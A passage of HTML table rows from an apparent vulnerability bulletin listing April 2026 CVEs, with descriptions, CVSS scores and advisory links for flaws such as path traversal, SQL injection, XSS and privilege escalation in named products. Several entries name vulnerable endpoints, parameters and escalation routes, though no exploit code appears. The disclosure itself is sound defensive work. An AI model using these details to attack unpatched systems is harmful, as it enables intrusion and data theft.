    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into a filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38.</td>
    <td>2026-04-10</td>
    <td>8.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31939" target="_blank" rel="noopener">CVE-2026-31939</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78</a><br><a href="https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">danbilabs--Advanced Members for ACF</td>
    <td>The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 1.2.5.</td>
    <td>2026-04-08</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3243" target="_blank" rel="noopener">CVE-2026-3243</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L57" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L57</a><br><a href="https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L266" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L266</a><br><a href="https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710</a><br><a href="https://plugins.trac.wordpress.org/changeset/3479725/" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3479725/</a><br><a href="https://plugins.trac.wordpress.org/changeset/3492372/" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3492372/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Elastic--Logstash</td>
    <td>Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or attacker-controlled update endpoint can write arbitrary files to the host filesystem with the privileges of the Logstash process. In certain configurations where automatic pipeline reloading is enabled, this can be escalated to remote code execution.</td>
    <td>2026-04-08</td>
    <td>8.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33466" target="_blank" rel="noopener">CVE-2026-33466</a></td>
    <td><a href="https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29/385816" target="_blank" rel="noopener">https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29/385816</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">homarr-labs--homarr</td>
    <td>Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. This vulnerability is fixed in 1.57.0.</td>
    <td>2026-04-06</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33510" target="_blank" rel="noopener">CVE-2026-33510</a></td>
    <td><a href="https://github.com/homarr-labs/homarr/security/advisories/GHSA-79pg-554g-rw82" target="_blank" rel="noopener">https://github.com/homarr-labs/homarr/security/advisories/GHSA-79pg-554g-rw82</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">IBM--Langflow Desktop</td>
    <td>IBM Langflow Desktop 1.6.0 through 1.8.2 could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component.</td>
    <td>2026-04-08</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3357" target="_blank" rel="noopener">CVE-2026-3357</a></td>
    <td><a href="https://www.ibm.com/support/pages/node/7268428" target="_blank" rel="noopener">https://www.ibm.com/support/pages/node/7268428</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33618" target="_blank" rel="noopener">CVE-2026-33618</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">lexiforest--curl_cffi</td>
    <td>curl_cffi is a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability is fixed in 0.15.0.</td>
    <td>2026-04-06</td>
    <td>8.6</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33752" target="_blank" rel="noopener">CVE-2026-33752</a></td>
    <td><a href="https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp" target="_blank" rel="noopener">https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices. Any user logged in, without requiring specific privileges, can issue 'request csds' CLI operational commands. These commands are only meant to be executed by highly privileged users or by users designated for Juniper Device Manager (JDM) / Connected Security Distributed Services (CSDS) operations, as they will impact all aspects of the devices managed via the respective MX. This issue affects Junos OS on MX Series: * 24.4 releases before 24.4R2-S3, * 25.2 releases before 25.2R2. This issue does not affect Junos OS releases before 24.4.</td>
    <td>2026-04-09</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33785" target="_blank" rel="noopener">CVE-2026-33785</a></td>
    <td><a href="https://kb.juniper.net/JSA107872" target="_blank" rel="noopener">https://kb.juniper.net/JSA107872</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">podman-desktop--podman-desktop</td>
    <td>Podman Desktop is a graphical tool for developing on containers and Kubernetes. Prior to 1.26.2, an unauthenticated HTTP server exposed by Podman Desktop allows any network attacker to remotely trigger denial-of-service conditions and extract sensitive information. By abusing missing connection limits and timeouts, an attacker can exhaust file descriptors and kernel memory, leading to application crash or full host freeze. Additionally, verbose error responses disclose internal paths and system details (including usernames on Windows), aiding further exploitation. The issue requires no authentication or user interaction and is exploitable over the network. This vulnerability is fixed in 1.26.2.</td>
    <td>2026-04-07</td>
    <td>8.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34045" target="_blank" rel="noopener">CVE-2026-34045</a></td>
    <td><a href="https://github.com/podman-desktop/podman-desktop/security/advisories/GHSA-2q88-39rh-gxvv" target="_blank" rel="noopener">https://github.com/podman-desktop/podman-desktop/security/advisories/GHSA-2q88-39rh-gxvv</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenClaw--OpenClaw</td>
    <td>OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing ownership and operator scope restrictions.</td>
    <td>2026-04-09</td>
    <td>8.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34512" target="_blank" rel="noopener">CVE-2026-34512</a></td>
    <td><a href="https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2" target="_blank" rel="noopener">GitHub Security Advisory (GHSA-9p93-7j67-5pc2)</a><br><a href="https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152" target="_blank" rel="noopener">Patch Commit</a><br><a href="https://www.vulncheck.com/advisories/openclaw-improper-access-control-in-sessions-sessionkey-kill-endpoint" target="_blank" rel="noopener">VulnCheck Advisory: OpenClaw &lt; 2026.3.25 - Improper Access Control in /sessions/:sessionKey/kill Endpoint</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">opnsense--core</td>
    <td>OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the login username directly into an LDAP search filter without calling ldap_escape(). An unauthenticated attacker can inject LDAP filter metacharacters into the username field of the WebGUI login page to enumerate valid LDAP usernames in the configured directory. When the LDAP server configuration includes an Extended Query to restrict login to members of a specific group, the same injection can be used to bypass that group membership restriction and authenticate as any LDAP user whose password is known, regardless of group membership. This vulnerability is fixed in 26.1.6.</td>
    <td>2026-04-09</td>
    <td>8.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34578" target="_blank" rel="noopener">CVE-2026-34578</a></td>
    <td><a href="https://github.com/opnsense/core/security/advisories/GHSA-jpm7-f59c-mp54" target="_blank" rel="noopener">https://github.com/opnsense/core/security/advisories/GHSA-jpm7-f59c-mp54</a><br><a href="https://github.com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb71813c6e" target="_blank" rel="noopener">https://github.com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb71813c6e</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Adobe--Acrobat Reader</td>
    <td>Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
    <td>2026-04-11</td>
    <td>8.6</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34621" target="_blank" rel="noopener">CVE-2026-34621</a></td>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-43.html" target="_blank" rel="noopener">https://helpx.adobe.com/security/products/acrobat/apsb26-43.html</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">MontFerret--ferret</td>
    <td>Ferret is a declarative system for working with web data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path and the file content. This can lead to remote code execution via cron jobs, SSH authorized_keys, shell profiles, or web shells. This vulnerability is fixed in 2.0.0-alpha.4.</td>
    <td>2026-04-06</td>
    <td>8.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34783" target="_blank" rel="noopener">CVE-2026-34783</a></td>
    <td><a href="https://github.com/MontFerret/ferret/security/advisories/GHSA-j6v5-g24h-vg4j" target="_blank" rel="noopener">https://github.com/MontFerret/ferret/security/advisories/GHSA-j6v5-g24h-vg4j</a><br><a href="https://github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5b83322917" target="_blank" rel="noopener">https://github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5b83322917</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">David Lingren--Media Library Assistant</td>
    <td>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media Library Assistant allows SQL Injection. This issue affects Media Library Assistant: from n/a through 3.34.</td>
    <td>2026-04-06</td>
    <td>8.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34885" target="_blank" rel="noopener">CVE-2026-34885</a></td>
    <td><a href="https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id=cve</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">adianti--Adianti Framework</td>
    <td>Adianti Framework 5.5.0 and 5.6.0 contain an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to modify user credentials and gain administrative access.</td>
    <td>2026-04-12</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2018-25257" target="_blank" rel="noopener">CVE-2018-25257</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46217" target="_blank" rel="noopener">ExploitDB-46217</a><br><a href="https://www.vulncheck.com/advisories/adianti-framework-and-sql-injection-via-profile" target="_blank" rel="noopener">VulnCheck Advisory: Adianti Framework 5.5.0 and 5.6.0 SQL Injection via Profile</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Resourcespace--ResourceSpace</td>
    <td>ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data.</td>
    <td>2026-04-12</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25693" target="_blank" rel="noopener">CVE-2019-25693</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46274" target="_blank" rel="noopener">ExploitDB-46274</a><br><a href="https://www.resourcespace.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://www.resourcespace.com/get" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php" target="_blank" rel="noopener">VulnCheck Advisory: ResourceSpace 8.6 SQL Injection via collection_edit.php</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Newsbull--Newsbull Haber Script</td>
    <td>Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code through the search parameter in endpoints like /admin/comment/records, /admin/category/records, /admin/news/records, and /admin/menu/childs to manipulate database queries and retrieve sensitive data.</td>
    <td>2026-04-12</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25699" target="_blank" rel="noopener">CVE-2019-25699</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46266" target="_blank" rel="noopener">ExploitDB-46266</a><br><a href="http://newsbull.org/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://github.com/gurkanuzunca/newsbull" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/newsbull-haber-script-authenticated-sql-injection-via-search-parameter" target="_blank" rel="noopener">VulnCheck Advisory: Newsbull Haber Script 1.0.0 Authenticated SQL Injection via search parameter</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Impresscms--ImpressCMS</td>
    <td>ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information.</td>
    <td>2026-04-12</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25703" target="_blank" rel="noopener">CVE-2019-25703</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46239" target="_blank" rel="noopener">ExploitDB-46239</a><br><a href="http://www.impresscms.org/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/impresscms-sql-injection-via-bid-parameter" target="_blank" rel="noopener">VulnCheck Advisory: ImpressCMS 1.3.11 SQL Injection via bid Parameter</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Across--DR-810</td>
    <td>Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and decompress the backup file, exposing router passwords and other sensitive configuration data.</td>
    <td>2026-04-12</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25706" target="_blank" rel="noopener">CVE-2019-25706</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46132" target="_blank" rel="noopener">ExploitDB-46132</a><br><a href="http://www.ac.i8i.ir/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://www.vulncheck.com/advisories/across-dr-810-rom-0-unauthenticated-file-disclosure" target="_blank" rel="noopener">VulnCheck Advisory: Across DR-810 ROM-0 Unauthenticated File Disclosure</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Ebrigade--eBrigade ERP</td>
    <td>eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table names and schema details.</td>
    <td>2026-04-12</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25707" target="_blank" rel="noopener">CVE-2019-25707</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46117" target="_blank" rel="noopener">ExploitDB-46117</a><br><a href="https://ebrigade.net/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%204.5/ebrigade_4.5.zip" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/ebrigade-erp-sql-injection-via-pdf-php" target="_blank" rel="noopener">VulnCheck Advisory: eBrigade ERP 4.5 SQL Injection via pdf.php</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">MyT--Project Management</td>
    <td>MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-based, time-based blind, or stacked query payloads to extract sensitive database information or manipulate data.</td>
    <td>2026-04-12</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25713" target="_blank" rel="noopener">CVE-2019-25713</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46084" target="_blank" rel="noopener">ExploitDB-46084</a><br><a href="https://manageyourteam.net/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://sourceforge.net/projects/myt/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/myt-pm-sql-injection-via-charge-group-total-parameter" target="_blank" rel="noopener">VulnCheck Advisory: MyT-PM 1.5.1 SQL Injection via Charge[group_total] Parameter</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Twitch--Twitch Studio</td>
    <td>Twitch Studio version 0.114.8 and prior contain a privilege escalation vulnerability in its privileged helper tool that allows local attackers to execute arbitrary code as root by exploiting an unprotected XPC service. Attackers can invoke the installFromPath:toPath:withReply: method to overwrite system files and privileged binaries, achieving full system compromise. Twitch Studio was discontinued in May 2024.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2024-14032" target="_blank" rel="noopener">CVE-2024-14032</a></td>
    <td><a href="https://www.iru.com/blog/twitch-privileged-helper" target="_blank" rel="noopener">https://www.iru.com/blog/twitch-privileged-helper</a><br><a href="https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-studio" target="_blank" rel="noopener">https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-studio</a><br><a href="https://help.twitch.tv/s/article/recommended-software-for-broadcasting" target="_blank" rel="noopener">https://help.twitch.tv/s/article/recommended-software-for-broadcasting</a><br><a href="https://www.vulncheck.com/advisories/twitch-studio-launcherhelper-xpc-missing-authorization-to-root-file-write" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/twitch-studio-launcherhelper-xpc-missing-authorization-to-root-file-write</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">WAGO--CC100 (0751-9x01)</td>
    <td>An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands, enabling the attacker to run arbitrary commands on the device.</td>
    <td>2026-04-09</td>
    <td>7.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2024-1490" target="_blank" rel="noopener">CVE-2024-1490</a></td>
    <td><a href="https://certvde.com/de/advisories/VDE-2024-008" target="_blank" rel="noopener">https://certvde.com/de/advisories/VDE-2024-008</a><br><a href="https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json" target="_blank" rel="noopener">https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.</td>
    <td>2026-04-08</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-12664" target="_blank" rel="noopener">CVE-2025-12664</a></td>
    <td><a href="https://hackerone.com/reports/3377091" target="_blank" rel="noopener">HackerOne Bug Bounty Report #3377091</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/work_items/579376" target="_blank" rel="noopener">https://gitlab.com/gitlab-org/gitlab/-/work_items/579376</a><br><a href="https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/" target="_blank" rel="noopener">https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Red Hat Enterprise Linux 10</td>
    <td>A flaw was found in libssh. This vulnerability allows local man-in-the-middle attacks, security downgrades of SSH (Secure Shell) connections, and manipulation of trusted host information, posing a significant risk to the confidentiality, integrity, and availability of SSH communications via an insecure default configuration on Windows systems where the library automatically loads configuration files from the C:\etc directory, which can be created and modified by unprivileged local users.</td>
    <td>2026-04-07</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14821" target="_blank" rel="noopener">CVE-2025-14821</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-14821" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-14821</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2423148" target="_blank" rel="noopener">RHBZ#2423148</a><br><a href="https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/" target="_blank" rel="noopener">https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory corruption when buffer copy operation fails due to integer overflow during attestation report generation.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-47389" target="_blank" rel="noopener">CVE-2025-47389</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory corruption while preprocessing IOCTL request in JPEG driver.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-47390" target="_blank" rel="noopener">CVE-2025-47390</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory corruption while processing a frame request from user.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-47391" target="_blank" rel="noopener">CVE-2025-47391</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Cryptographic issue while copying data to a destination buffer without validating its size.</td>
    <td>2026-04-06</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-47400" target="_blank" rel="noopener">CVE-2025-47400</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Case Themes--Case Theme User</td>
    <td>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion. This issue affects Case Theme User: from n/a before 1.0.4.</td>
    <td>2026-04-10</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-5804" target="_blank" rel="noopener">CVE-2025-5804</a></td>
    <td><a href="https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Zootemplate--Cerato</td>
    <td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS. This issue affects Cerato: from n/a through 2.2.18.</td>
    <td>2026-04-10</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-58920" target="_blank" rel="noopener">CVE-2025-58920</a></td>
    <td><a href="https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validation of JSON payloads.</td>
    <td>2026-04-08</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1092" target="_blank" rel="noopener">CVE-2026-1092</a></td>
    <td><a href="https://hackerone.com/reports/3487030" target="_blank" rel="noopener">HackerOne Bug Bounty Report #3487030</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/work_items/586479" target="_blank" rel="noopener">https://gitlab.com/gitlab-org/gitlab/-/work_items/586479</a><br><a href="https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/" target="_blank" rel="noopener">https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br></td>
